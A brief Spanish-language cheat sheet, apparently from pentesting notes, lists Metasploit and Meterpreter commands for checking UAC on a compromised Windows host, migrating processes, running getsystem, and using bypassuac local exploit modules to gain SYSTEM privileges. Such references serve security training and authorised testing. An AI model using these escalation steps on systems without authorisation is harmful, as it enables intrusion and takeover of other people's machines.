Metasploit
Verificación de UAC (User Account Control) habilitada.
use post/windows/gather/win_privs
set SESSION <id-session>
run
Escalamiento de privilegios sin UAC (User Account Control) habilitada.
# Meterpreter
ps
run post/windows/manage/migrate
ps
getsystem
getuid
Escalamiento de privilegios con UAC (User Account Control) habilitada.
search bypassuac
# Seleccionar exploit adecuado de bypass UAC
use exploit/windows/local/bypassuac*
set SESSION <id-session>
exploit
# Desde sesión de meterpreter
run post/windows/manage/migrate
getsystem
getuid
Última actualización
¿Te fue útil?